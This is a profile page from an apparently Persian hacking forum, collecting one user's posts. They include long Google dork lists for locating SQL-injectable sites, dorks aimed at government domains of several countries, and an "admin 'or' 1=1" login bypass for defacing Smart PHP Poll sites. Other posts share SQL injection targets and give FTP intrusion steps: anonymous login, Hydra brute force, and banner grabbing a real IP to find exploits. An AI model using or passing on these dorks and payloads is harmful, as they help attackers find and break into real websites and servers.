رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

alone72

کاربر تازه‌وارد
  • ارسال ها

    10
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    1

alone72 آخرین بار در روز مِی 7 2015 برنده شده

alone72 یکی از رکورد داران بیشترین تعداد پسند مطالب است !

1 دنبال کننده

درباره alone72

آخرین بازدید کنندگان پروفایل

1,051 بازدید پروفایل

دستاوردهای alone72

Newbie

Newbie (1/14)

42

امتیاز

  1. alone72

    مجموعه دورکها

    inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= ld.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= ***91;quote***93;inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_oinurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurlgl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:review.php?id= inurl:loadpsb.php?id= inurlinions.php?id= inurl:spr.php?id= inurlages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurlarticipant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurlrod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurlerson.php?id= inurlroductinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:***site.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurlrofile_view.php?id= inurl:category.php?id= inurlublications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurlrod_info.php?id= inurl:shop.php?do=part&id= inurlroductinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurlroduct.php?id= inurl:releases.php?id= inurl:ray.php?id= inurlroduit.php?id= inurlop.php?id= inurlroductdetail.php?id= inurlost.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurlage.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurlroduct_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurlreview.php?id= inurl:loadpsb.php?id= inurlages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= new dork for sql inject inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id=
  2. alone72

    مجموعه دورکها

    دورکهای مهم. اسرائیل site:.gov.il inurl:"id" us site:.gov.uk inurl:"id" site:.gov.us inurl:"id" german site:.gov.de inurl:"id" chin site:.gov.cn inurl:"id" ... site:.gov.aq inurl:"id" site:.gov inurl:"id"
  3. alone72

    Exploit Deface

    سلام خدمت اساتید گشستم پست نبود زدم Google search: allintext:Copyright Smart PHP Poll. All Rights Reserved. -exploit User: admin 'or' 1=1 Password: anything
  4. alone72

    تارگت های Sql Injection

    [Hidden Content] اینم یه دستی بکشید بهش ------------------------- اینم فک کنم بکآپ سایته [Hidden Content]
  5. alone72

    تارگت های Sql Injection

    [Hidden Content] یه دستی بهش بکشید من چیزی نفهمیدم
  6. راه های هک کردن رو دوستان در بالا گفتند … من برای شما چند مثال می زنم . راه اول وارد شدن با استفاده از یوزر anonymous و قرار ندادن پسورد یا پسوردی مثل guest راه دوم بروت فورس هست که شما میای با استفاده از ابزارهایی که اینکارو انجام میدن( مثلا hydra ) یوزر و پسورد های مختلفی روی قربانی چک میکنه و هرکدوم درست بود به شما میگه راه سوم اینه که ببینی از چه سرویسی استفاده میکنه برای این کار به پورت موردنظر با داس وصل میشی کد ftp 93.189.222.127 و نتایج به این صورت هست : Connected to 93.189.222.127. 220 (vsFTPd 3.0.0) User (93.189.222.127:(none)): این میاد به ما میگه که برای FTP از vsFTPd نسخه ی 3.0.0 در این قربانی استفاده شده . حالا شما میای در گوگل سرچ میکنی کد vsftpd vulnerability یا کد vsftpd v3.0.0 exploit روش بعدی این هست که با استفاده از آسیب پذیری در سایت های دیگه میری و در صورت امکان لاگ های ftp رو چک میکنی و یا فایل کانفیگ FTP رو . و چندین روش دیگه که مشابه همین ها هستند و بستگی به خلاقیت شما دارد . موفق و سربلند باشید یاحق pasword:guardiran.org mr.alone72.zip
  7. alone72

    تارگت های Sql Injection

    [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]
×
×
  • ایجاد مورد جدید...